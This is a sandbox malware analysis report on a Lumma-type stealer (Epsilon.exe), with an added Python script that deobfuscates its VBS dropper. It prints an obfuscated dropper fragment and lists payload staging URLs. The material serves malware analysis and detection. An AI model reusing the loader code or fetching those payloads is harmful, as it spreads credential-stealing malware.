        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Timestomp | Cached Domain Credentials | 16 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        Behavior Graph ID: 1582590 | Sample: Epsilon.exe | Startdate: 31/12/2024 | Architecture: WINDOWS | Score: 100

        DNS/IP info: raw.githubusercontent.com; bitbucket.org
        Top-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 11 other signatures

        Process tree:
        Epsilon.exe (1 3) started
          dropped: C:\Users\user\AppData\...\677174b841ee7.vbs, ASCII
          cmd.exe (3 2) started
            wscript.exe (1) started
              signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
              powershell.exe (7) started
                signatures: Suspicious powershell command line found; Found suspicious powershell code related to unpacking or dynamic code loading
                powershell.exe (14 23) started
                  network: raw.githubusercontent.com 185.199.111.133, 443, 49704 FASTLYUS Netherlands
                  network: bitbucket.org 185.166.143.48, 443, 49705 AMAZON-02US Germany
                  signatures: Loading BitLocker PowerShell Module
                conhost.exe started
            conhost.exe started

        Source | Detection | Scanner | Label | Link
        Epsilon.exe | 37% | ReversingLabs | Win64.Spyware.Lummastealer |
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        Source | Detection | Scanner | Label | Link
        https://atlassianblog.wpengine.com/wp-json/wp/v2/posts?tags=11972&context=embed&per_page=6&orderby=d | 0% | Avira URL Cloud | safe |
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        bitbucket.org | 185.166.143.48 | true | false |  | high
        raw.githubusercontent.com | 185.199.111.133 | true | false |  | high
        Name | Malicious | Antivirus Detection | Reputation
        https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg | false |  | high
        https://bitbucket.org/rterterq/fwqfqweqwr/downloads/opkSkch.txt | false |  | high
        Name | Source | Malicious | Antivirus Detection | Reputation
        https://id.atlassian.com/login | powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net | powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        http://pesterbdd.com/images/Pester.png | powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://id.atlassian.com/logout | powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://admin.atlassian.com | powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://web-security-reports.services.atlassian.com/csp-report/bb-website | powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611 | powershell.exe, 00000005.00000002.2430048549.0000027B3A3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2466653987.0000027B523E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2168306779.000001A1DA390000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175839410.000001A1DC001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2170048890.000001A1DA670000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2168503153.000001A1DA419000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2168306779.000001A1DA3B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2170230937.000001A1DA684000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ | powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://api.bitbucket.org | powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ | powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net | powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/c9b3998323c0/jsi18n/en/dj | powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://dz8aopenkvv6s.cloudfront.net | powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://github.com/Pester/Pester | powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://preferences.atlassian.com | powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://id.atlassian.com/manage-profile/ | powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://www.atlassian.com/try/cloud/signup?bundle=bitbucket | powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://raw.githubusercontent.com | powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://remote-app-switcher.prod-east.frontend.public.atl-paas.net | powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net | powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://bitbucket.status.atlassian.com/ | powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://cdn.cookielaw.org/ | powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://atlassianblog.wpengine.com/wp-json/wp/v2/posts?tags=11972&context=embed&per_page=6&orderby=d | powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; | powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://aui-cdn.atlassian.com/ | powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/c9b3998323c0/dist/webpack | powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmp | false |  | high
        https://remote-app-switcher.stg-east.frontend.public.atl-paas.net | powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmp | false |  | high
                                                                      https://aka.ms/pscore68powershell.exe, 00000005.00000002.2430048549.0000027B39E95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2430048549.0000027B39E57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175839410.000001A1DC001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://bitbucket.org/gateway/api/emoji/powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.2430048549.0000027B39EBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175839410.000001A1DC001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://bitbucket.orgpowershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
IP | Domain | Country | ASN | ASN Name | Malicious
185.166.143.48 | bitbucket.org | Germany | 16509 | AMAZON-02 (US) | false
185.199.111.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLY (US) | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582590
Start date and time: 2024-12-31 00:45:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Epsilon.exe
Detection: MAL
Classification: mal100.spre.expl.evad.winEXE@12/8@2/2
                                                                              EGA Information:
                                                                              • Successful, ratio: 50%
                                                                              HCA Information:
                                                                              • Successful, ratio: 100%
                                                                              • Number of executed functions: 29
                                                                              • Number of non-executed functions: 28
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                              • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45, 23.1.237.91
                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Execution Graph export aborted for target powershell.exe, PID 7504 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              • VT rate limit hit for: Epsilon.exe
Time | Type | Description
18:45:55 | API Interceptor | 42x Sleep call for process: powershell.exe modified
Context: IPs
Match | Associated sample name / URL | Detection | Threat name | Context
185.166.143.48 | http://bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt | malicious | Unknown | bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt
185.199.111.133 | cr_asm2.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.111.133 | cr_asm_crypter.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.111.133 | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.111.133 | BeginSync lnk.lnk | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt

Context: domains
Match | Associated sample name / URL | Detection | Threat name | Context
raw.githubusercontent.com | eXbhgU9.exe | malicious | LummaC | 185.199.110.133
raw.githubusercontent.com | Purchase Order Summary Details.vbs | malicious | LodaRAT, XRed | 185.199.108.133
raw.githubusercontent.com | Purchase Order Summary Details.vbs | malicious | LodaRAT, XRed | 185.199.108.133
raw.githubusercontent.com | Supplier.bat | malicious | Unknown | 185.199.110.133
raw.githubusercontent.com | Supplier.bat | malicious | LodaRAT, XRed | 185.199.111.133
raw.githubusercontent.com | NEW-DRAWING-SHEET.bat | malicious | Unknown | 185.199.111.133
raw.githubusercontent.com | fxsound_setup.exe | malicious | Unknown | 185.199.109.133
raw.githubusercontent.com | OiMp3TH.exe | malicious | LummaC | 185.199.108.133
raw.githubusercontent.com | 8lOT1rXZp5.exe | malicious | RedLine | 185.199.111.133
raw.githubusercontent.com | Purchase Order No. G02873362-Docx.vbs | malicious | LodaRAT, XRed | 185.199.108.133
bitbucket.org | j6ks0Fxu6t.exe | malicious | LummaC | 185.166.143.50
bitbucket.org | fnCae9FQhg.exe | malicious | LummaC | 185.166.143.48
bitbucket.org | SFtDA07UDr.exe | malicious | LummaC | 185.166.143.48
bitbucket.org | Gq48hjKhZf.exe | malicious | LodaRAT | 185.166.143.49
bitbucket.org | Gq48hjKhZf.exe | malicious | Unknown | 185.166.143.48
bitbucket.org | 2oM46LNCOo.exe | malicious | LummaC | 185.166.143.50
bitbucket.org | tTGxYWtjG5.exe | malicious | LummaC | 185.166.143.48
bitbucket.org | iaLId0uLUw.exe | malicious | LummaC | 185.166.143.50
bitbucket.org | yuij5p5p3W.exe | malicious | LummaC | 185.166.143.50
bitbucket.org | NAnOVCOt4L.exe | malicious | LummaC | 185.166.143.50

Context: ASNs
Match | Associated sample name / URL | Detection | Threat name | Context
FASTLY (US) | https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.com | malicious | HTMLPhisher | 151.101.194.137
FASTLY (US) | https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188 | malicious | KnowBe4 | 199.232.192.193
FASTLY (US) | https://tepco-jp-lin;.%5Dshop/co/tepco | malicious | Unknown | 199.232.188.157
FASTLY (US) | eXbhgU9.exe | malicious | LummaC | 185.199.110.133
FASTLY (US) | Purchase Order Summary Details.vbs | malicious | LodaRAT, XRed | 185.199.108.133
FASTLY (US) | Purchase Order Summary Details.vbs | malicious | LodaRAT, XRed | 185.199.108.133
FASTLY (US) | Supplier.bat | malicious | Unknown | 185.199.110.133
FASTLY (US) | Supplier.bat | malicious | LodaRAT, XRed | 185.199.111.133
FASTLY (US) | NEW-DRAWING-SHEET.bat | malicious | Unknown | 185.199.111.133
FASTLY (US) | https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.com | malicious | Unknown | 151.101.2.137
AMAZON-02 (US) | boatnet.arm6.elf | malicious | Mirai | 34.249.145.219
AMAZON-02 (US) | kwari.arm.elf | malicious | Unknown | 54.168.12.166
AMAZON-02 (US) | kwari.mpsl.elf | malicious | Unknown | 52.63.235.181
AMAZON-02 (US) | kwari.arm7.elf | malicious | Mirai | 52.17.112.151
AMAZON-02 (US) | boatnet.mips.elf | malicious | Mirai | 54.171.230.55
AMAZON-02 (US) | dlr.arm7.elf | malicious | Unknown | 34.249.145.219
AMAZON-02 (US) | https://tepco-jp-lin;.%5Dshop/co/tepco | malicious | Unknown | 54.65.22.195
AMAZON-02 (US) | BHgwhz3lGN.exe | malicious | Vidar | 18.244.18.122
AMAZON-02 (US) | i.elf | malicious | Unknown | 54.171.230.55
AMAZON-02 (US) | securedoc_20241220T111852.html | malicious | Unknown | 13.32.121.110

Context: JA3 fingerprints
Match | Associated sample name / URL | Detection | Threat name | Context
3b5074b1b5d032e5620f69f9f700ff0e | XClient.exe | malicious | XWorm | 185.166.143.48, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | hoEtvOOrYH.exe | malicious | SmokeLoader | 185.166.143.48, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | web44.mp4.hta | malicious | LummaC | 185.166.143.48, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | random.exe | malicious | LummaC | 185.166.143.48, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | eXbhgU9.exe | malicious | LummaC | 185.166.143.48, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | Supplier.bat | malicious | Unknown | 185.166.143.48, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | Supplier.bat | malicious | LodaRAT, XRed | 185.166.143.48, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | NEW-DRAWING-SHEET.bat | malicious | Unknown | 185.166.143.48, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | Requested Documentation.exe | malicious | MassLogger RAT, PureLog Stealer | 185.166.143.48, 185.199.111.133
                                                                              No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:Nlllul/+qll/h:NllU2el/
MD5: A228F8449DB5EE3A5E620715CD8F41DF
SHA1: 79E774D342BD0A4261CE1F7FC6EC2734687629AC
SHA-256: C495093C40C899E10AD5F5BD9298B53C090B4A5EDC2D66742BB91A9DD17F35DC
SHA-512: 40C9E42AE02C452BCAE13DF5BADEA1BE686109BADEDB2E533AC78E813EE39B153E0290901D70E35D840FA960777A81753B40D36E843A66E81D3EB6DB066BF75B
Malicious: false
Reputation: low
Preview: @...e................................................@..........

Process: C:\Users\user\Desktop\Epsilon.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 16223
Entropy (8bit): 5.43957642350105
Encrypted: false
SSDEEP: 384:HvoXNp+ORKJjaaJbx3pvtJqv10MFpW9pUf2:HQXNphK5aaR7tJYw
MD5: 2526E6344FEFB98B06722075A48EB1D2
SHA1: 8FED44B0D696CEF3771EDD5B1B6FB836EA56136A
SHA-256: 4EB0F0207BB99F33B78DA74498525E249B689661EA457DC8BF6AC262FF2FCA43
SHA-512: AA5C4D0453829ECFF09AA8864AC7EA78D8588B7D5B47D14F09022338DB5E6C46772BFADAF4BF55441F73AE31C563CA692268FFC594E12887F2F7CF8B461A8653
Malicious: true
Reputation: low
                                                                              Preview: 'g..FdemrkiadmF = rRegisggfgdsadfkjhgjg211 & ""..kimAIjFcf = TimeSerial(9,8,9)..Call Ugsfisging("$do" & "sigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$")..Call Ugsfisging("ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQ")..IIpddIpA = TimeSerial(7,8,8)..Public Const fhASbpe = "Sdjkmgho"..kjpeImAde = "hffhfg" & LenB("fSgdafdnS") & "hfg"..'dncrigd aIobbokkd..ermnmbgdI = TimeSerial(7,8,7)..Public Const rbiiAAf = "FnmImIbi"..'rgAAkeIp mkmdbek..Call Ugsfisging("B0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b")..Call Ugsfisging("$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$")..kjkdnca = TimeSerial(9,9,8)..Public Const Fbpbdokb = "ioAjImn"..diefdfr = "hffhfg" & LenB("fSoccaj") & "hfg"..'mmkarim hojeAIgfe..kjecpgSg = TimeSerial(7,7,9)..Public Const AIdmpmkkk = "pncmibckk"..'AfarcrI fcIcrhi..Call Ugsfisging("YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$
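The preview above is the only view of the VBS dropper this report gives, and it is enough to recover what the script assembles. Between the junk assignments, each Call Ugsfisging(...) appends a chunk to one PowerShell string literal ($dosigo = '...'), and the chunks are base64 of UTF-16LE text in which every 'A' has been swapped for '$'. That substitution is inferred from the data rather than shown by the page: with '$' restored to 'A', the five visible chunks concatenate and decode to [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 followed by the start of a function named DownloadDataFromLinks, after which the preview is cut off. The Python below is an added example, not part of the report or of the sample; VBS_PREVIEW is constructed from the preview text (line breaks restored, the truncated last call closed), the function and variable names in it are the script's own, and the replacement guesser is a general technique that does not rely on knowing the swapped character in advance.

```python
import base64
import re
import string

# Constructed sample input: the Call Ugsfisging(...) lines visible in the sandbox
# preview of the dropped VBS, one per line (the preview renders line breaks as
# ".."), with some of the surrounding junk statements kept so the extractor has
# to skip them. The last call is cut off in the preview; its closing ") is added.
VBS_PREVIEW = r'''
kimAIjFcf = TimeSerial(9,8,9)
Call Ugsfisging("$do" & "sigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$")
Call Ugsfisging("ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQ")
IIpddIpA = TimeSerial(7,8,8)
Public Const fhASbpe = "Sdjkmgho"
kjpeImAde = "hffhfg" & LenB("fSgdafdnS") & "hfg"
Call Ugsfisging("B0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b")
Call Ugsfisging("$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$")
Public Const Fbpbdokb = "ioAjImn"
Call Ugsfisging("YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$")
'''

CALL_RE = re.compile(r'^\s*Call\s+Ugsfisging\((.*)\)\s*$', re.MULTILINE)
# One VBS string literal; a doubled quote inside a literal is an escaped quote.
LITERAL_RE = re.compile(r'"((?:[^"]|"")*)"')
B64_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + '+/'


def call_arguments(vbs_source):
    """Return the string argument of every Ugsfisging call, in file order,
    with VBS '&' concatenation and doubled-quote escapes resolved."""
    args = []
    for call in CALL_RE.finditer(vbs_source):
        literals = LITERAL_RE.findall(call.group(1))
        args.append(''.join(lit.replace('""', '"') for lit in literals))
    return args


def assembled_literal(args, var_name='$dosigo'):
    """The calls build one statement of the form  $dosigo = '<blob>'  piece by
    piece. Return <blob>; the preview is truncated, so no closing quote is
    expected."""
    joined = ''.join(args)
    prefix = var_name + " = '"
    if not joined.startswith(prefix):
        raise ValueError('unexpected assembled prefix: %r' % joined[:24])
    return joined[len(prefix):]


def decode_substituted(blob, replaced_char, real_char):
    """Undo a one-character substitution and decode the blob as base64 of
    UTF-16LE text. A truncated trailing group is dropped or padded instead of
    raising, so partial previews still yield the readable prefix."""
    b64 = blob.replace(replaced_char, real_char)
    if len(b64) % 4 == 1:          # a single leftover character can never decode
        b64 = b64[:-1]
    b64 += '=' * (-len(b64) % 4)
    raw = base64.b64decode(b64, validate=True)
    return raw.decode('utf-16-le', errors='replace')


def guess_substitution(blob, replaced_char='$'):
    """Try every base64 alphabet character as the replacement for the foreign
    character and return (char, score) for the one whose UTF-16LE decoding is
    most printable. In UTF-16LE ASCII the high byte of every code unit is 0x00,
    so 'A' (six zero bits) dominates such blobs, which is exactly why droppers
    hide it; the scorer recovers it without being told."""
    printable = set(string.printable)
    best, best_score = None, -1.0
    for candidate in B64_ALPHABET:
        try:
            text = decode_substituted(blob, replaced_char, candidate)
        except (ValueError, UnicodeDecodeError):
            continue
        score = sum(ch in printable for ch in text) / max(len(text), 1)
        if score > best_score:
            best, best_score = candidate, score
    return best, best_score


def recover_powershell(vbs_source, replaced_char='$'):
    """End to end: dropper source text -> recovered PowerShell fragment."""
    blob = assembled_literal(call_arguments(vbs_source))
    real_char, _ = guess_substitution(blob, replaced_char)
    return decode_substituted(blob, replaced_char, real_char)


if __name__ == '__main__':
    print(recover_powershell(VBS_PREVIEW))
```

The recovered text stops mid-parameter list because the preview does; the rest of the dropper is not on this page and is not guessed here. The same decode applies to anything PowerShell runs via -EncodedCommand, since that too is base64 over UTF-16LE, and a blob that is unusually rich in one character outside the base64 alphabet is the tell that this kind of substitution has been applied.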
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                              Entropy (8bit):6.8540668895535575
                                                                              TrID:
                                                                              • Win64 Executable GUI (202006/5) 92.65%
                                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                                              • DOS Executable Generic (2002/1) 0.92%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:Epsilon.exe
                                                                              File size:163'840 bytes
                                                                              MD5:61566aa90d2dcaf483fe4697031f46c4
                                                                              SHA1:b072393ac533c868683a93aa98e350144a772c34
                                                                              SHA256:51826c6098770542d808375156b42c288ba675863a73eca9084c402a11771b2d
                                                                              SHA512:721dc75de9c5027a9f4e864814b2955ea5df8f2222eeea6f2dd4a2e430510eb2d2eec0aa34593f8ecce5e8831f1f1c110f9819a5e0b8424b7e171cf07e36f4d2
                                                                              SSDEEP:3072:mahKyd2n31r5GWp1icKAArDZz4N9GhbkrNEk1q6T:mahOzp0yN90QE6
                                                                              TLSH:D9F38D5AA7E420A6E4BA577498F202935A32BCB15B7583FF12C4D57E0E336C0A532F17
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6...7...6...7...6...7...6...7...6...6...6...7...6..o6...6...7...6Rich...6................PE..d................."
                                                                              Icon Hash:3b6120282c4c5a1f
                                                                              Entrypoint:0x140008200
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x140000000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:10
                                                                              OS Version Minor:0
                                                                              File Version Major:10
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:10
                                                                              Subsystem Version Minor:0
